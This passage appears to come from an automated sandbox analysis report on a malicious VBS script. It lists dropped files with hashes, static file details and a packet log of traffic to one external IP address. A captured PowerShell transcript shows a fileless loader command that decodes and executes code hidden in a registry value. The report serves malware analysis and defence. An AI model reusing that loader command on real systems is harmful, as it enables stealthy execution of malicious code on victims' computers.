                                                                                                                                                  SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                                  MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                                  SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                                  SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                                  SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF1624FA75E6F83D1C.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12933
                                                                                                                                                  Entropy (8bit):0.4090117760705182
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:c9lCg5/9lCgeK9l26an9l26an9l8fRDj+F9l8fRDjC9lTqDjtbembyraj3:c9lLh9lLh9lIn9lIn9loD+9loDu9lWD9
                                                                                                                                                  MD5:B9AF4D56ADD9D459CC73BD2A3539D82E
                                                                                                                                                  SHA1:03308A2CFDC0A945370C08E029AA63847A1725F1
                                                                                                                                                  SHA-256:E302F38DFE0C598B398C02083EE65539FA651ADB7170300846D9ACBBEB7F0094
                                                                                                                                                  SHA-512:C4ABB5CB54E2D211F19646255205404F37895BAA954EDDEE5FC67F6E2AC1AA79741C64BFCFF1014546D82484761C551FFE27118FE4F03AF3546AD777D2B92011
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF37BA40AC4A7503AA.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40161
                                                                                                                                                  Entropy (8bit):0.6740432504962018
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:kBqoxKAuqR+zN/2dwHuf/yrGHuf/yr9Huf/yre:5uf/yrGuf/yrRuf/yre
                                                                                                                                                  MD5:4B89969483337901B04B986D02BD3C97
                                                                                                                                                  SHA1:CAC54435E2B42792B7E8A50C1B33044B7AC59C5F
                                                                                                                                                  SHA-256:229773E8D06146DFE13AA18575C4BB62A555A1C178E0F986F8C30248B51E3353
                                                                                                                                                  SHA-512:3E96CE877520ABA3E58E74167DA6A6C2D76EE43A1B9AF3FF31853196546A4299C6FCAAFAA4E5E15CBE4E02AD52B882C703CC34A10BF74AA6A4EBB5D6864C827D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF3BF043E2E5AE47CD.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):13189
                                                                                                                                                  Entropy (8bit):0.557970530061577
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loE9loU9lWWLTUS6PK:kBqoIv5WLTUSJ
                                                                                                                                                  MD5:393321B8305B11EA46E4E5D7162AEFCB
                                                                                                                                                  SHA1:6FA25F35F9739C85C6033867FD1B875F541A8F88
                                                                                                                                                  SHA-256:A9B9903B3AF5C5EA254096750806C504AC21DE0B150E592DBEE40A76EB54A9CF
                                                                                                                                                  SHA-512:1AEB559537E1291CC22E3BDAE17A8DFFA8316E542A0EFDD156328FB2100C01E299053474EC5086D3FEFD4F91D44306ADAF6054ABD484B1915C618DC07A9934CD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF507B04238EE2FD71.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40153
                                                                                                                                                  Entropy (8bit):0.6718513886063531
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+9DhAju+utUYYGUXF+utUYYGUXO+utUYYGUXT:kBqoxKAuqR+9DhAju+UU1+UUe+UUj
                                                                                                                                                  MD5:D42BB357E3D0952BA82DE97287AC6286
                                                                                                                                                  SHA1:F7B20AA414F81417BB62698F7A30C743022FC20B
                                                                                                                                                  SHA-256:EC957B8DA26D7D17B0B847A9D2D048523D5726C0571CE1A0DC3EC66B1DC7AC78
                                                                                                                                                  SHA-512:2FE7057366BDF073CC9E85BB437538E523737EF51DA311758A453219BFE35844FC9C6462C5F990A2AEE75CB646B52FDEEF17D3F5F7B7916C4481FFD773630C63
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF5D75D0687426FD6E.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40217
                                                                                                                                                  Entropy (8bit):0.6806091502339366
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:kBqoxKAuqR+Ks2/s9ut5w3Kut5w3tut5w3e:kBqoxKAuqR+Ks2/s9au3Kau3tau3e
                                                                                                                                                  MD5:456FE41CC2D14F08E95A72506FFB4625
                                                                                                                                                  SHA1:FD063DE61AD5969BB823072E60E2A15E5CD578DE
                                                                                                                                                  SHA-256:233D96BA2D79B6D4C5C4C1B4D5C124CF28B7DC7B7F22CEF0E8B7A625A9011D01
                                                                                                                                                  SHA-512:1D44C5C289234BC144D2FE4888E5BE32D6D23F0A866E4A55B9745D205F16F124C97446B7A366DF60CF4F3709DBC201441B14FE6BB1EB6FA1E79B303508643010
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}
                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):54
                                                                                                                                                  Entropy (8bit):4.162476745088645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:+UUuFt1UbFHVFddBWD1UEPv:+KsbFHVKDeEX
                                                                                                                                                  MD5:0C78343997853F414D35DA57E92260CE
                                                                                                                                                  SHA1:4082B2850FE46BF3CF57516ACCEBDC8EE63D70B8
                                                                                                                                                  SHA-256:89267508EB7F7278D62116F4D1FAE370F85F56DF8A6D9DE73B090293DCA695E0
                                                                                                                                                  SHA-512:6AFC885AA621DDF1BD7CEB63ED66AA4A3AF175E0F7391995AF277C67217A1C7A7E664B713F0015F303C8224BE8864F02D655BDFA79B5D1641F6BD712D0E721C2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 24-11-2020 20:36:35 | "0xb88d3fdf_5fa2c4f12d12f" | 1..
                                                                                                                                                  C:\Users\user\Documents\20201124\PowerShell_transcript.468325.cqIz2fYX.20201124203543.txt
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1189
                                                                                                                                                  Entropy (8bit):5.3190006399502705
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSAnxy7vBZ0x2DOXUWOLCHGIYBtLWQyHjeTKKjX4CIym1ZJX/q3OLCHGIYBtcM0:BZWvj0oORF/QyqDYB1ZYFK+4ZZY+S
                                                                                                                                                  MD5:B78953D232276C85BBBD506451E3C429
                                                                                                                                                  SHA1:F5A50CE79F0751385E3FCD933E4F7B621584C3DC
                                                                                                                                                  SHA-256:13970608E55B3FAEB1D85884E83B915C4CAF7C2BF24AFA676CBD64D21B291AF9
                                                                                                                                                  SHA-512:9CD2736D7BF808CD22EE1E6760478AADC0879050C1E8101135FEA08E06A83BE1B4D468B87788EF0288F602DC35A7B6CD331D9E8BBE3EA6DBE0DCCD15CAC7177F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20201124203544..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5976..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201124203544..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..
                                                                                                                                                  \Device\ConDrv
                                                                                                                                                  Process:C:\Windows\System32\nslookup.exe
                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28
                                                                                                                                                  Entropy (8bit):4.039148671903071
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U+6QlBxAN:U+7BW
                                                                                                                                                  MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                                                                                                                  SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                                                                                                                  SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                                                                                                                  SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Non-authoritative answer:...

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                  Entropy (8bit):4.2287108937994855
                                                                                                                                                  TrID:
                                                                                                                                                    File name:0xyZ4rY0opA2.vbs
                                                                                                                                                    File size:367774
                                                                                                                                                    MD5:91c16c7f676eec811c3ad36e32a9dbb3
                                                                                                                                                    SHA1:5395939a249782d0d6651d970f9a3af1df8924f6
                                                                                                                                                    SHA256:67998bc22f994c7acb53cf98d8cf4d039a31b425f2b2f0c6d949426df05542c9
                                                                                                                                                    SHA512:511aa225bc36a5210184657d2dc8d6e6d711f28402ed0337f9ea3dc08a478da34b75b9e3d59c30c33d5072ae2fa31b6b2df54c146ac1529d29f53b32affc8f27
                                                                                                                                                    SSDEEP:3072:VDRp0xBRYkxWblq7iQh6qDkLBPUdgyaHoJr6OU:hqRBxIl4P6qoL5Ud/PJOOU
                                                                                                                                                    File Content Preview:' Alberich Greek martial temptress presto babe, Semite rueful re fairway Estes Steinberg paratroop finesse Bangladesh authenticate allusive grapevine scattergun late, tugging gorgon Bateman inexplicable. swingy bitumen Coriolanus foreign Osaka indivisible

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:e8d69ece869a9ec4

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 24, 2020 20:34:41.233448029 CET4973980192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:41.233710051 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:41.510910988 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:41.511039019 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:41.512365103 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:41.515373945 CET804973947.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:41.515470982 CET4973980192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:41.831897020 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636598110 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636662960 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636694908 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636724949 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636758089 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636785984 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.636789083 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.636820078 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.636826038 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.636856079 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.675457954 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.675483942 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.675501108 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.675515890 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.675575018 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.675626993 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.913803101 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913832903 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913845062 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913857937 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913877010 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913897038 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913914919 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913930893 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913938046 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.913947105 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913963079 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913978100 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913994074 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.913995028 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.914020061 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.914047956 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.952511072 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952545881 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952579975 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952610970 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952621937 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.952636003 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952656031 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.952662945 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952678919 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.952689886 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952714920 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.952723026 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:42.952737093 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:42.952780962 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191060066 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191123009 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191160917 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191199064 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191229105 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191235065 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191282034 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191288948 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191323996 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191329956 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191360950 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191365004 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191400051 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191410065 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191437006 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191442966 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191473961 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191487074 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191510916 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191520929 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191541910 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191549063 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191590071 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191595078 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191637039 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191653013 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191673040 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191685915 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191706896 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191710949 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191749096 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191751957 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191785097 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191787004 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191817045 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.191838026 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.191876888 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.238730907 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238795042 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238835096 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238876104 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238903999 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.238914013 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238951921 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238964081 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.238989115 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.238991022 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.239026070 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.239027023 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.239073038 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.239073992 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.239115953 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.239126921 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.239152908 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.239164114 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.239202976 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.277605057 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277637959 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277653933 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277681112 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277704000 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277729034 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277750015 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277774096 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.277776003 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.277837038 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.439443111 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.442481041 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.468925953 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.468972921 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.468996048 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469022036 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469046116 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469063044 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.469068050 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469094992 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469114065 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.469119072 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469141960 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469147921 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.469166040 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469183922 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.469187975 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469208956 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.469217062 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.469243050 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.516165018 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516201019 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516225100 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516247034 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516268969 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516294956 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516318083 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516339064 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516360044 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.516585112 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640194893 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640260935 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640285969 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640285969 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640311003 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640316010 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640336990 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640338898 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640361071 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640362024 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640383959 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640384912 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640408039 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640409946 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640429974 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640434027 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640453100 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640460014 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640475988 CET4974080192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:34:43.640484095 CET804974047.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:43.640500069 CET4974080192.168.2.447.241.19.44
